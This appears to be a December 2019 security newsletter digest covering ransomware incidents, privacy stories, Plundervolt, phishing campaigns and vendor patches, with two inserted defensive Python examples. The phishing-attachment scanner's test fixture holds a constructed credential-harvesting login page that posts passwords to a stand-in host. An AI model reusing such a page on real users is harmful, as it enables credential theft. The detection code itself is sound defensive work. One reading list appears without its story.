The headline on 18 December 2019
Facebook Tracks Users’ Purchases in the Physical World. A recent report highlights that a partnership between Facebook and several retailers enables the retailers to transfer the purchase history of their customers to Facebook. Facebook in turn uses that data to target those customers with advertisements relating to their purchases when they access the Facebook social media platform.
- I am less worried about Facebook’s capability for targeting than I am about who they allow to use the targeting capabilities, and what policies Facebook applies to the content and transparency of the “ads” that are put in front of targeted users. The prime example is Facebook’s policy to allow any content from political advertisers, with minimal or no differentiation when Custom or Lookalike Audience targeting is used. This allows blatant lies and misinformation to be put in front of targeted audiences that would never be allowed by other advertising channels, both traditional and modern social media, like Twitter and Google.
- Facebook’s business practices are such that it is unlikely that users can understand the risk of doing business with them. Better to just avoid doing business with them altogether.
Read more in:
- 6abc > Report: Facebook tracks in-store purchases, targets users with ads
- Business Insider > This is how Facebook learns what you buy at physical stores in order to show you relevant ads — and how to opt out
New Jersey Hospital System Victim of Ransomware Attack. Hackensack Meridian Health, the largest hospital system in New Jersey, was the victim of a ransomware attack and ultimately paid the ransom to restore its systems. The attack forced hospitals that are clients of Hackensack Meridian Health to postpone non-emergency operations and left medical staff unable to access electronic records. Hackensack Meridian Health said its primary clinical system is now back online and that it is working on restoring other affected systems. The company is working with the FBI and cybersecurity experts. Hackensack Meridian Health runs 17 acute care and specialty hospitals, nursing homes, outpatient centers, and the psychiatric facility Carrier Clinic.
Personal Data of Facebook Employees Exposed on Stolen Unencrypted Hard Drives. Personal data of 29,000 US-based Facebook employees, including banking data, was lost when unencrypted hard drives were stolen from a payroll worker’s car. Police are investigating the theft. It is unclear why the employee stored the unencrypted hard drives in their car and why the drives were being transported in this way. A spokesperson for Facebook stated that the company has taken appropriate disciplinary action against the payroll employee involved.
Note: Obviously several policy failures here. This can be a good news item to use to drive a check on current policies around encrypting storage as a default and providing secure mechanisms for data transport that should eliminate any reason to carry hard drives around in cars!
Read more in:
- The Verge > A thief stole unencrypted hard drives filled with 29,000 Facebook employees’ information
- Bloomberg > Thief Stole Payroll Data for Thousands of Facebook Employees
- The Register > Valuable personal info leaks from Facebook – not Zuck selling it, unencrypted hard drives of staff data stolen
Google Hands Feds 1,500 Phone Locations In Unprecedented ‘Geofence’ Search. Forbes has discovered that Google has complied with so-called geofence warrants that have resulted in an “unprecedented” data haul for law enforcement: one in which Google combed through its SensorVault to find 1,494 device identifiers for phones in the vicinity of the fires and then handed them over to the Bureau of Alcohol, Tobacco, Firearms and Explosives (ATF).
Note: Recent court decisions and FCC investigations into “who owns location data” have tended to focus on telecoms carriers and, to some extent, mobile phone manufacturers. This case points out that location-based metadata is collected and stored by many different companies. Courts and legislators are moving slower than ever; we need the technology companies to be proactive about adopting secure defaults for protecting location data and providing high transparency about when it is collected and sold or given to third parties.
Read more in:
- nakedsecurity by SOPHOS > Police get “unprecedented” data haul from Google with geofence warrants
- Forbes > Google Hands Feds 1,500 Phone Locations In Unprecedented ‘Geofence’ Search
Internet of Things Gear is Generating Easy-to-Crack Keys. A preponderance of weak keys is leaving IoT devices at risk of being hacked, and the problem won’t be an easy one to solve. This was the conclusion reached by the team at security house Keyfactor, which analyzed a collection of 75 million RSA certificates gathered from the open internet and determined that number combinations were being repeated at a far greater rate than they should be, meaning encrypted connections could possibly be broken by attackers who correctly guess a key.
- There used to be a talking Barbie doll that would say “Math is hard!” which was certainly sexist, but still a very, very true statement. Crypto is math, and crypto is hard – 25 years ago the US government issued the FIPS-140 standard because of crappy crypto coming out in commercial software. Similar action is needed for the IoT generation of claims of use of cryptography to secure device use.
- IoT device manufacturers continue to prioritize time-to-market over security. Until that situation improves, leverage segmentation and restrict network access to only services they need, if any.
Read more in:
- Keyfactor > Factoring RSA Keys in the IoT Era
- The Register > Internet of crap (encryption): IoT gear is generating easy-to-crack keys
New Orleans Mayor Declares State of Emergency After City Cyberattack. New Orleans Mayor LaToya Cantrell declared a state of emergency Friday after the city was hit by a cyberattack. Phishing attempts and suspicious activity were detected on the city’s network around 5 a.m., and by 11 a.m., technician investigators detected “a cybersecurity incident” causing the city’s information technology department to begin powering down servers and city computers as a precaution.
Read more in:
- Security Magazine > New Orleans Hit by Cyberattack; Declares State of Emergency
- CNN > New Orleans mayor declares state of emergency in wake of city cyberattack
Blue Cross Blue Shield of Minnesota Scrambling to Improve Cybersecurity. An internal whistleblower raised concerns that Minnesota’s largest health insurer has neglected thousands of important updates to its computer systems. The company’s top cybersecurity executive says the insurer has been working diligently in recent weeks to reduce its vulnerability to a cyber attack. Internal documents show that BCBS of Minnesota has allowed 200,000 vulnerabilities deemed “critical” or “severe” to linger for years on its computer systems, despite warnings to executives.
Many phishing sites spotted in global government-focused campaign. Over 62 domains and 122 phishing sites targeting government users were discovered by security vendor Anomali. Unlike other phishing campaigns, which can be detected through their spelling and grammar errors, these are well-crafted multi-language campaigns, so the primary indications are that the messages come from unknown users and carry unexpected attachments.
Read more in:
- Infosecurity > Over 100 Phishing Sites Spotted in Global Government Campaign
- ISBuzz News > New Phishing Campaign Targeting Gov’t Departments Around The World – Commentary From Email Security Expert
FTC advice on checking Internet-connected toys before buying. Internet-connected toys are in high demand this year, and the FTC is making recommendations for parents to consider prior to purchase and upon receipt. The advice includes checking for microphones and cameras and verifying that you can tell when they are active. Another recommendation: don’t rely on the Children’s Online Privacy Protection Act (COPPA). Checklists like this are beneficial, but remember that regardless of the security reputation of the manufacturer and regulatory oversight, you must verify which features are enabled and that they are configured properly.
Read more in:
- BleepingComputer > FTC Advises Checking Smart Toy Features Before Buying
- Federal Trade Commission Consumer Information > Buying an internet-connect smart toy? Read this
- Norton > 8 ways to help protect your kids’ privacy against smart toy vulnerabilities
Relaunched Toys R Us uses technology to monitor customers. The relaunched Toys R Us stores now include sensors to monitor customer activity. In support of the new business model, which leases areas of the store to toy providers, sensors installed by business partner B8ta will monitor how customers move around the store and determine which areas get the most activity. There has been some social media uproar relating to confusion over the term “monitoring shopper cadence,” which is meant to capture shopper movement patterns, not conversation or voice capture; additionally, there are concerns about whether the system actually ignores people under four feet tall in order not to run afoul of COPPA requirements regarding parental consent prior to data capture for children under 13.
Note: The data collected will be used to influence the costs of the leased spaces, particularly those with high success rates. The question of not capturing patrons under four feet tall versus the claim that the information is being captured in public places, and not bound by COPPA needs to be resolved quickly; especially as Toys R Us is catering to children.
Read more in:
- syracuse > Geoffrey’s watching: Sensors at new Toys R Us stores track shoppers
- FierceElectronics > Revived Toys R Us wired up to monitor customers
- WIRED > Toys “R” Us is back – Now With More Surveillance!
Plundervolt Voltage Attack Steals Data from Intel Chips. The newly discovered “Plundervolt” vulnerability (CVE-2019-11157) uses CPU voltage modification to target and expose data in Intel’s Software Guard Extensions (SGX). Intel has released a microcode update to address the issue; alternatively, the SGX functionality can be disabled. Data recovered can include keys needed for cryptographic operations, and the exploit can be used to corrupt program memory. To use the protections offered by SGX, it must be both enabled in the BIOS and incorporated into application code. Exploitation requires local privileged access.
Note: Because the likelihood of exploitation is low, due to local privileged access requirements, Intel released a microcode fix that addresses this. The promise of SGX is encrypted enclaves to protect sensitive code, even from code running at higher privilege levels, and is intended to bring added security to cloud based computing.
Read more in:
- nakedsecurity by SOPHOS > Plundervolt – stealing secrets by starving your computer of voltage
- SecurityWeek > Plundervolt Attack Uses Voltage to Steal Data from Intel Chips
- PCWorld > Protecting your Intel CPU from Plundervolt attacks can ruin your overclock, maybe
Some hardware-based password managers store passwords in plaintext. Investigation of the ecZone Password Safe, passwordsFAST, and Royal Vault Password Keeper devices by security researcher Phil Eveleigh found that while a passcode is used to protect access to the stored passwords, direct access to the chip provides access to the plain-text passwords as well as the master PIN. Further, he found that even after a full reset the passwords were not cleared in some devices. Note that while the Royal Vault Password Keeper encrypts the data, decryption is possible by discovering the master PIN within the stored dataset. No responses have been received from the device manufacturers regarding the issues discovered.
Note: Retrieving the clear-text passwords required chip-level access to the device, which makes the risk of exploit low. Even so, unless the wipe operation can be verified, choose physical destruction rather than wipe and reissue. Also, be sure to use strong master passwords to limit unauthorized access to passwords through the normal mechanisms.
Read more in:
- SecurityWeek > Hardware-based Password Managers Store Credentials in Plaintext
- BleepingComputer > Some Hardware-based Password Managers have poor security
Last patches for Windows 10 Mobile released. The last round of security patches for Microsoft’s Windows 10 Mobile was released, marking the end of Microsoft’s attempt at a mobile operating system. Windows 10 Mobile officially reached end of support on June 11, 2019. Many Microsoft execs carry Android devices rather than ones powered by Windows Mobile. Bill Gates feels that had he not been distracted by copyright and related lawsuits, and had Windows Mobile been released three months earlier, the market niche held by Android would have been Microsoft’s.
- In 2010, at a session at a Gartner conference, I asked then Microsoft CEO Steve Ballmer how Microsoft was going to succeed in the mobile phone market, and his answer was “Windows, baby!” Also, six years earlier Bill Gates said Microsoft would rid the world of spam by 2006. I don’t think copyright issues and lawsuits are really to blame for the failure of those two predictions. But owners of large installed bases do tend to invest too much in fighting off threats to the profitability of that base vs. innovating to meet users’ changing needs. As many of the stories in this issue point out, we are nearing one of those tipping points around protecting user data vs. profiting from it.
- Windows Mobile was a nice operating system, and Microsoft wanted to be “the” mobile device OS provider. Success wasn’t solely dependent on the timing of the release or lawsuits; I recall the market was looking for an open solution, which is where Android fit in.
London Metropolitan Police Trained to Fight Cybercrime. A Freedom of Information request submitted to the London Metropolitan Police has highlighted that thousands of police on that force have received some level of training in fighting cybercrime. The training has been provided using online training solutions: approximately 4,500 officers took the “Cyber Crime and Digital Policing – First Responder” course, while another 4,500 completed the “Cyber Crime and Digital Policing – Introduction” course.
Note: The average citizen is not going to have the background on how to select help during an incident, so providing them the option to call the police when they have a cyber incident, and get a responder who has been properly trained raises the bar on proper actions being taken and increases the likelihood of a successful outcome.
The headline on 15 December 2019
WordPress 5.3.1 Security & Maintenance release resolves the following issues:
- Unprivileged users could make a post sticky via the REST API.
- A stored cross-site scripting vulnerability in links.
- A stored cross-site scripting vulnerability using block editor content.
The headline on 11 December 2019
44 Million Compromised Credentials Used on Microsoft Accounts. Microsoft engineers recently analyzed over three billion credentials known to be compromised by criminals. Utilizing sources from law enforcement and public databases of breached accounts the Microsoft Team identified 44 million user accounts of Microsoft services were reusing known compromised credentials. These accounts ranged from Microsoft’s consumer services to credentials used by companies for Microsoft Azure.
- Credential reuse, and/or poor password choices by users necessitate the use of multi-factor authentication. IDPs can be configured for location and device awareness to raise the bar, or completely block authentication for unknown devices or untrusted environments. Disable, or highly restrict the use of legacy protocols that cannot be configured for MFA.
- Reused passwords and fraudulent password reuse are known problems, but they are the result of the bind in which many users find themselves. Users should employ password managers and strong authentication, such as is offered by Microsoft and its peers. Enterprises should avoid overly complex password rules that make choosing a password difficult and should offer strong authentication options to their users.
Read more in:
- Infosecurity Group > Microsoft: 44 Million User Passwords Have Been Breached
- Help Net Security > Compromised passwords used on 44 million Microsoft accounts
China Reportedly Orders State Offices To Remove Foreign Tech Which Could Hit US Firms Like Microsoft. China’s Communist Party has ordered all state offices to remove foreign hardware and software within three years. Systems and software are to be replaced with Chinese provided equivalents. The replacement encompasses 20-30 million pieces of equipment and commences in 2020. Organizations are required to meet milestones of 30%, 50% and 20% in 2020, 2021 and 2022 respectively. China began building a Windows and iOS replacement in 2013, with the help of British company Canonical. This move affects US providers including HP, Dell, and Microsoft. China’s latest policy may be seen as one of the most direct moves against U.S. technology firms during the trade war.
Note: Unfortunately, the longer these types of trade war escalations continue, the more the likelihood of impact on buying and selling of security products and services increases. Huawei and Kaspersky have seen the impact of US directives against buying their security products; large US security vendors could see similar impacts from large foreign markets. From an enterprise perspective, this dictates the need for backup planning in case your existing vendors are caught in the crossfire. [Neely] This is motivated by trade wars and threats of economic sanctions rather than increased security or locally produced products. Even Chinese vendors such as Lenovo or Huawei are heavily impacted by these sanctions. Businesses need to consider location when developing lists of alternate suppliers, particularly when suppliers are overseas and can be impacted by such actions.
Read more in:
- CNBC > China reportedly orders state offices to remove foreign tech which could hit US firms like Microsoft
- Financial Times > Beijing orders state offices to replace foreign PCs and software
- The Telegraph > China orders officials to remove foreign tech from computers
- ZDNet > Chinese government to replace foreign hardware and software within three years
- TechCrunch > China moves to ban foreign software and hardware from state offices
New Zealand Releases Cybersecurity Governance Resource. New Zealand’s Government Communications Security Bureau’s National Cyber Security Centre (NCSC) has produced a resource for boards to help improve cybersecurity governance. The NCSC study interviewed cybersecurity professionals from 250 of New Zealand’s nationally significant organizations. The governance resource called Charting Your Course: Cyber Security Governance sets out six areas that will help focus engagement between an organization’s governance and its security practitioners.
Note: This initial publication is a good deal too buzzword-laden for me – anytime I see “resilient”, “security culture” and “holistic” on one page my eyes glaze over. Hopefully, the follow-on drill-down documents will focus more on bridging the realities of corporate governance and operations to the realities of effective cybersecurity as a critical and integral factor in the success of the corporation.
Read more in:
- CISA > NCSC-NZ Releases Cyber Governance Resource for Leaders
- OpenGov Asia > New Zealand releases cybersecurity governance resource
- National Cyber Security Centre > Charting Your Course: Cyber Security Governance
Google Releases Open Source Tool for Finding File Access Vulnerabilities. On Monday, Google released the source code of a tool designed to help developers identify vulnerabilities related to file access. The tool, named PathAuditor, has been useful to Google, and the company has now decided to release it as open source. The tech giant is still actively working on PathAuditor and pointed out that it’s not an officially supported Google product.
Note: Many vulnerability assessment/management tools will find similar vulnerabilities; check with your existing vendor. Google often throws spaghetti at the wall and then moves on – unless this gets broad support, it is better to see existing products incorporate such capabilities.
Read more in:
- SecurityWeek > Google Releases Open Source Tool for Finding File Access Vulnerabilities
- Google Security Blog > Detecting unsafe path access patterns with PathAuditor
New Phishing Campaign Uses Self-Contained Webpage to Steal Credentials. Researchers have spotted a new phishing campaign that attempts to steal credentials. However, this campaign is different from the commonly observed ones. The phishing attack does not redirect victims to another site for login like a lot of phishing campaigns usually do. Instead, it bundles the scam’s landing page in the HTML attachment, likely in an attempt to bypass security filters and analytics on web proxies.
Note: Scanners don’t typically inspect the attached HTML content sufficiently to discover malicious content embedded in these attachments. While we coach users to use caution with attachments, the prevalence of applications that attach content in HTML attachments encourages the opposite behavior. In addition to focusing on updated user awareness, consider endpoint protection strategies that include blocking access to non-categorized and known bad sites.
Read more in:
- SANS ISC InfoSec Forums > Phishing with a self-contained credentials-stealing webpage
- CYWARE > New Phishing Campaign Uses Self-Contained Webpage to Steal Credentials
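As an added example (not code from the ISC or CYWARE write-ups), the following Python shows the kind of inspection a mail filter needs to apply to HTML attachments: it parses a constructed .eml message, decodes each text/html attachment and flags it when the attachment carries its own login form with a password field that posts to an external host. The sample message, sender address and form target are all constructed placeholders.

```python
"""Flag e-mail messages that carry a self-contained credential-harvesting
page as an HTML attachment.  Added example: a constructed .eml is parsed
with the standard library, every text/html attachment is decoded, and the
attachment is flagged when it contains a form with a password field that
posts to an external host.  Sender, host and message are all constructed."""
import base64
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse


class _FormScanner(HTMLParser):
    """Collect form targets and note any password input in an HTML document."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.has_password_field = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password_field = True


def scan_html(html_text):
    """Return credential-form indicators found in one HTML document."""
    p = _FormScanner()
    p.feed(html_text)
    hosts = [urlparse(u).hostname for u in p.form_actions]
    return {
        "password_field": p.has_password_field,
        "form_actions": p.form_actions,
        "external_post_hosts": [h for h in hosts if h],
    }


def scan_message(raw_eml):
    """Walk a raw RFC 5322 message and return findings per HTML attachment."""
    msg = email.message_from_string(raw_eml, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        if part.get_content_disposition() != "attachment":
            continue  # the HTML body of an ordinary mail is not an attachment
        result = scan_html(part.get_content())  # transfer encoding is undone here
        result["filename"] = part.get_filename()
        # A login form living entirely inside the attachment and posting the
        # credentials to an outside host is the pattern the campaign uses.
        result["suspicious"] = (result["password_field"]
                                and bool(result["external_post_hosts"]))
        findings.append(result)
    return findings


# Constructed sample: a tiny HTML login page attached to a short message.
_ATTACHED_PAGE = """<html><body>
<form method="post" action="https://example.invalid/collect.php">
  Email <input name="user">
  Password <input type="password" name="pass">
  <input type="submit" value="Sign in">
</form></body></html>"""

SAMPLE_EML = (
    "From: payroll@example.invalid\r\n"
    "To: user@example.org\r\n"
    "Subject: Your statement\r\n"
    "MIME-Version: 1.0\r\n"
    'Content-Type: multipart/mixed; boundary="b1"\r\n\r\n'
    "--b1\r\n"
    "Content-Type: text/plain\r\n\r\n"
    "Please open the attached statement.\r\n"
    "--b1\r\n"
    'Content-Type: text/html; name="statement.html"\r\n'
    "Content-Transfer-Encoding: base64\r\n"
    'Content-Disposition: attachment; filename="statement.html"\r\n\r\n'
    + base64.b64encode(_ATTACHED_PAGE.encode()).decode() + "\r\n"
    "--b1--\r\n"
)

if __name__ == "__main__":
    for finding in scan_message(SAMPLE_EML):
        print(finding)
```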
US Government Website For Federal Rules Input Inaccessible Due To Expired SSL Certificate. Regulations.gov, the US Government’s portal for industry and the public to make comments in response to proposed regulations, suffered a self-inflicted denial of service attack when the digital certificate to enable secure HTTP expired. The website returned to service on Monday night after being out for much of the day. At least one government agency had to extend the deadline on public comment. [Neely] Current browser versions do a really good job of blocking access to sites with certificate problems, whether expired, untrusted issuer, name-mismatch, etc., raising the bar for the IT team to keep certificates updated. Consider using certificate issuers that support automated updates. Alternately, a script to scan and alert on certificates that are due to expire is not difficult to create; make sure the alerts trigger ITSM tickets so they won’t be missed.
Read more in:
- San Francisco Chronicle > Government website for federal rules input shuts off
- Bloomberg Tax > Labor Department Extends Comment Period on Tip-Pool Proposal
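As an added example of the kind of script the note describes (not code from the page or from Regulations.gov), the following Python checks the notAfter date of each host’s certificate against a warning window so that expiring or already-expired certificates can be raised as alerts before they cause an outage. The WARN_DAYS policy and the host list are assumptions; the date values in the comments are constructed.

```python
"""Certificate-expiry scanner: classify each host's TLS certificate as
ok / expiring / expired so an alert (or ITSM ticket) can be raised ahead of
time.  Added example, not from the page; warning window and hosts assumed."""
import socket
import ssl
import time

WARN_DAYS = 14  # assumed policy: alert when fewer than 14 days remain


def days_until_expiry(not_after, now=None):
    """Days left for a certificate whose notAfter is in the format that
    ssl.getpeercert() returns, e.g. 'Dec 31 23:59:59 2019 GMT'.
    `now` is a POSIX timestamp (defaults to the current time); a negative
    result means the certificate has already expired."""
    if now is None:
        now = time.time()
    expiry_ts = ssl.cert_time_to_seconds(not_after)  # parses the GMT string
    return (expiry_ts - now) / 86400


def classify(not_after, now=None, warn_days=WARN_DAYS):
    """Map a notAfter value to 'expired', 'expiring', or 'ok'."""
    remaining = days_until_expiry(not_after, now)
    if remaining < 0:
        return "expired"
    if remaining < warn_days:
        return "expiring"
    return "ok"


def fetch_not_after(host, port=443, timeout=5.0):
    """Open a TLS connection and return the peer certificate's notAfter.
    Verification stays enabled on purpose: an untrusted issuer or a name
    mismatch is also something the monitor should surface, and it does so
    by raising ssl.SSLError here."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.getpeercert()["notAfter"]


def scan_hosts(hosts, warn_days=WARN_DAYS):
    """Return {host: status} for a list of hostnames.  Connection and
    verification failures are reported as 'error: <reason>' so they appear
    in the alert instead of being silently skipped."""
    report = {}
    for host in hosts:
        try:
            report[host] = classify(fetch_not_after(host), warn_days=warn_days)
        except (OSError, KeyError, ValueError) as exc:  # ssl.SSLError is an OSError
            report[host] = "error: %s" % exc
    return report


if __name__ == "__main__":
    # Constructed host list; replace with your own certificate inventory.
    for host, status in scan_hosts(["example.invalid"]).items():
        print(host, status)
```

Anything other than "ok" in the report is what the ITSM ticket should be raised on, including the error entries.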
New Jersey Shakespeare Theater Hit By Ransomware. The Shakespeare Theatre of New Jersey was forced to cancel a performance of “A Christmas Carol” after its reservation and ticketing system was hit by ransomware. They are currently selling tickets, but are not able to perform seat assignments until patrons arrive at the venue. Other businesses in their area were reportedly also affected at the same time.
Note: This underscores the value of reaching out to customers during an incident, being transparent about the incident and asking for their support. Patrons continue to make reservations and bear with the theater as they work to restore normal operations. Make sure your DR/Incident response plan includes customer notification and support.
Read more in:
- SC Magazine > My Kingdom for a decryptor! Ransomware creates ticketing snafu for N.J. Shakespeare theater
- BleepingComputer.com > Ransomware Writes Drama at Shakespeare Theatre
- New Jersey Stage > Severe Ransomware Attack Strikes The Shakespeare Theatre of New Jersey Ticketing System On Eve of “A Christmas Carol” run
Read more in:
- Forbes > China Fires ‘Great Cannon’ Cyber-Weapon At The Hong Kong Pro-Democracy Movement
- ZDNet > China resurrects Great Cannon for DDoS attacks on Hong Kong forum
Apple Explains iPhone 11 Location Requests. Apple’s iPhone 11 uses Ultra-Wideband (UWB) radio for short-range, high-bandwidth file exchange. UWB uses location services to find other UWB devices. These requests happen even when applications and services are set not to request location data. This is disabled in airplane mode. The location checks also verify that the device is in a country where UWB is permitted.
Note: Future versions of iOS are supposed to contain a setting explicitly for toggling UWB. The wide spectrum, multi-channel use by UWB permits data transfer at up to 1.6Gbps for a few meters. UWB is currently used to improve the performance of Airdrop.
Read more in:
- KrebsOnSecurity > Apple Explains Mysterious iPhone 11 Location Requests
- TechCrunch > Apple says its ultra-wideband technology is why newer iPhones appear to share location data, even when the setting is disabled
- iPhone User Guide > Ultra Wideband information
US-CERT AA19-339A: Dridex Malware. A recent collaboration between the Department of Treasury’s FinCEN and CIG groups, in response to Dridex malware’s continued use in the financial sector, provides a consolidated reference on Dridex including an overview, related activities, IOCs, mitigations, and recommendations.
Read more in:
- CISA > US-CERT Alert (AA19-339A)
- SafeBreach > Hacker’s Playbook Already Protects for Methods used in US-CERT Malware Analysis Alert AA19-339A
T-Mobile Launches 600MHz 5G. T-Mobile pushed out 5G service across the US, but using its 600MHz LTE-like spectrum. This service doesn’t operate at full 5G speeds. The fastest 5G requires millimeter wave (mmWave), which is easily obstructed and doesn’t travel far.
Note: Mobile Operators are rolling out 5G in stages, leveraging their existing LTE resources and spectrum. Your device may report a 5G (or 5Ge) connection without delivering the increased speed promised by 5G. mmWave deployments, needed for those increased speeds, require a very dense deployment of radios and supporting fiber infrastructure, which some communities are challenging.
Read more in:
- The Verge > T-Mobile launches 600MHz 5G across the US, but no one can use it until December 6th
- CNBC > T-Mobile shows why it’s still too early to buy a 5G phone
Car Makers BMW and Hyundai Victims of Cyber Attack. The carmakers BMW and Hyundai are reported to have been hacked by a criminal group known as Ocean Lotus, also known as APT 32. The alleged compromise is reported to have happened in the spring of 2019, when BMW’s security team discovered an instance of a commercial hacking tool, Cobalt Strike, installed on a workstation. The reports also state that the car manufacturer Hyundai was also a victim of this group. The Ocean Lotus group is alleged to be behind attacks against other car manufacturers such as Toyota Japan, Toyota Australia, and Toyota Vietnam.
Read more in:
- ZDNet > BMW and Hyundai hacked by Vietnamese hackers, report claims
- BleepingComputer > BMW Infiltrated by Hackers Hunting for Automotive Trade Secrets
- BR24 > Autoindustrie im Visier von Hackern: BMW ausgespäht (Original reporting from German media – note reports are in German)
- ARD > BMW von Hackern ausgespäht
Amazon Buckets Leak over 750,000 Applicants’ Data for US Birth Certificates. A company that provides a service to allow customers to apply for copies of birth certificates from US States has allegedly exposed the personal details of those applicants. A UK based security research company identified the unsecured Amazon Bucket which contained the personal details of 750,000 people. The data includes their name, date of birth, email address, and home address, amongst other details.
The headline on 07 December 2019
Data Center Ransomware Infection. Data center provider CyrusOne has confirmed that it suffered a ransomware attack earlier this week. The company says that the incident has caused “availability issues” for six of its managed services customers.
- This attack appears to be caused by a version of the REvil (Sodinokibi) ransomware, which also impacted 23 local governments across Texas earlier this year. Consider the impact/risks if one of your providers, such as your colocation service or your MSP, is impacted and doesn’t plan to pay the ransom, as is indicated in this case; are you prepared with alternatives to continue operations for the duration of the incident?
- The six customers are called “collateral damage.” The drug company, Merck, was such collateral damage when one of its service providers was compromised. It has caused them to re-think and restructure their relationship with the thousands of providers in their “supply chain.”
Illinois School District Hit with Ransomware. The Sycamore Community School District 427 in Illinois has been hit with ransomware. The attack appears to be limited to the district’s “internal technology servers;” many other district systems, including email, phones, and student information systems are reportedly not infected.
Evil Corp. Hacking Group Indictments. US federal prosecutors have indicted Maksim Yakubets and Igor Turashev, who are allegedly members of the hacking group known as Evil Corp. The pair allegedly “led one of the most sophisticated transnational cybercrime syndicates in the world,” according to a US Department of Justice press release.
Read more in:
- Department of Justice.gov > Russian National Charged with Decade-Long Series of Hacking and Bank Fraud Offenses Resulting in Tens of Millions in Losses and Second Russian National Charged with Involvement in Deployment of “Bugat” Malware
- Ars Technica > Kingpin of Evil Corp lived largely. Now there’s a $5 million bounty on his head
- WIRED > Alleged Russian Hacker Behind $100 Million Evil Corp Indicted
- SC Magazine > U.S. charges alleged members of “Evil Corp” cybercrime group for Zeus and Dridex campaigns
- THE HILL > US sanctions Russian group over $100M cyber hack
Man-in-the-Middle Attack Used to Steal Venture Capital Investment. Hackers used a complex man-in-the-middle attack to steal approximately US $1 million from a Chinese venture capital firm that was supposed to be going to a start-up company in Israel. The hackers set up phony domains and spoofed emails between the companies, even going so far as to cancel a scheduled in-person meeting.
Note: Verify the log retention period and access requirements for your email and related systems before an incident, making sure that there are not only at least six months of information but also that sufficient information is captured and your staff will be able to access it when needed. Always use an out-of-band verification process with wire transfers to ensure they are going to the intended recipient.
Read more in:
- Check Point Research > Incident Response Casefile – A successful BEC leveraging lookalike domains
- threatpost > ‘Ultimate’ MiTM Attack Steals $1M from Israeli Startup
- VICE > Hackers Trick Venture Capital Firm Into Sending Them $1 Million
- The Register > VCs find exciting new way to blow $1m: Wire it directly to hackers after getting spoofed
Great Cannon DDoS Tool Reportedly Being Used on Hong Kong Protesters’ Online Forum. A distributed denial-of-service (DDoS) tool known as the Great Cannon has reportedly been used against the LIHKG social media platform used by protesters in Hong Kong. China’s Great Cannon was first described by Citizen Lab in April 2015.
Read more in:
- BleepingComputer > The Great Cannon DDoS Tool Used Against Hong Kong Protestors’ Forum
- Infosecurity GROUP > China’s Great Cannon Fires on Hong Kong Protesters
- the Citizen Lab > China’s Great Cannon
ZeroCleare Wiper Malware Used Against Energy, Industrial Organizations in the Middle East. IBM has detected new malware, dubbed ZeroCleare, that has been used to wipe data at energy and industrial sector organizations in the Middle East. The targeted attacks were likely the work of Iranian state-sponsored hackers.
Note: We must move away from the default access control rule of “read/write,” convenient but risky, to “read-only” for data and “execute only” for programs, marginally less convenient but you will get over it.
Read more in:
- SecurityIntelligence > New Destructive Wiper ZeroCleare Targets Energy Sector in the Middle East
- The Register > Oil be damned: Iran-based crooks flinging malware at Middle Eastern energy plants again – research
- cyberscoop > IBM sounds alarm about more data-wiping malware from Iran
- threatpost > Iran Targets Mideast Oil with ZeroCleare Wiper Malware
- ZDNet > Iranian hackers deploy new ZeroCleare data-wiping malware
- Ars Technica > New Iranian wiper discovered in attacks on Middle Eastern companies
- DARKReading > Shades of Shamoon: New Disk-Wiping Malware Targets Middle East Orgs
- BleepingComputer > New Iranian ZeroCleare Data Wiper Malware Used in Targeted Attacks
- Duo Security > New ZeroCleare Wiper Malware Used In Targeted Attacks
US Senators Get Classified Ransomware Briefing. US legislators received a classified briefing about the threat of ransomware on Wednesday, December 5. Christopher Krebs, director of the US Department of Homeland Security’s (DHS’s) Cybersecurity and Infrastructure Security Agency (CISA) spoke to the Senate Cybersecurity Caucus.
- Briefings like this are needed to ensure continued support of initiatives and resources to help state and local governments which may not have access to the needed tools and information to implement needed protections in the current threat environment. That said, with the current active exploitation environment, waiting for external help is ill-advised.
- Ransomware is now the preferred way to monetize compromised systems and enterprises. We know that the vectors for attacks are e-mail and browsers, but we fail to isolate these from mission-critical data, applications, and systems. We know that the vulnerability includes the capability for the system user to modify it on the fly, but we fail to lock them down by denying the user admin privileges and by restricting “write” access. This is not mere negligence but borders on recklessness.
Read more in:
- cyberscoop > DHS official briefs senators on state ransomware threats in a classified meeting
- Fifth Domain > Here’s what senators learned about the ransomware threat
- THE HILL > Senators sound alarmed on dangers of ransomware attacks after briefing
Rich Communication Services Implementations Found to be Insecure. Researchers have found that telecommunications carriers are implementing a new messaging standard in ways that could allow communications to be intercepted, modified, or spoofed. The Rich Communication Services (RCS) standard is fairly new and has a broader range of features than SMS.
- What’s being called into question are implementation flaws, rather than flaws in the protocol itself. RCS shows promise to provide a more secure alternative to SMS and avoid the pitfalls in SS7. RCS is one to keep an eye on, especially when a verified secure implementation is available.
- It looks as if messaging may be going the route of the browsers: adding features until the product is porous, not to say broken.
Read more in:
- VICE > SMS Replacement is Exposing Users to Text, Call Interception Thanks to Sloppy Telecos
- WIRED > The Future of Texting Is Far Too Easy to Hack
Siemens Provides Workaround for PLC Flaw. Siemens has released workarounds to address a vulnerability in its S7-1200 programmable logic controllers (PLCs) while it develops a fix for the problem. The issue lies in “an undocumented hardware-based special access feature,” and could be exploited to take control of vulnerable devices.
Read more in:
- DARKReading > Siemens Offers Workarounds for Newly Found PLC Vulnerability
- Siemens ProductCERT > Hardware-based manufacturing access on S7-1200 (PDF)
NIST Draft Guidance on Hardware Supply Chain Security. The US National Institute of Standards and Technology (NIST) has published draft guidance on hardware supply chain security, Validating the Integrity of Servers and Client Devices. NIST will accept comments on the document through January 6, 2020.
Note: This is about building standards to support supply chain security, which has been a challenge of late. The document is a short, easy read, encapsulating information from some other NIST and external documents on OEM supply chain security. Despite the short timeline and the holiday season, it’s worth reading and contributing to.
Read more in:
- NIST > Validating the Integrity of Servers and Client Devices (PDF)
- Duo Security > NIST Developing Hardware Security Guidelines for Enterprises
The headline on 04 December 2019
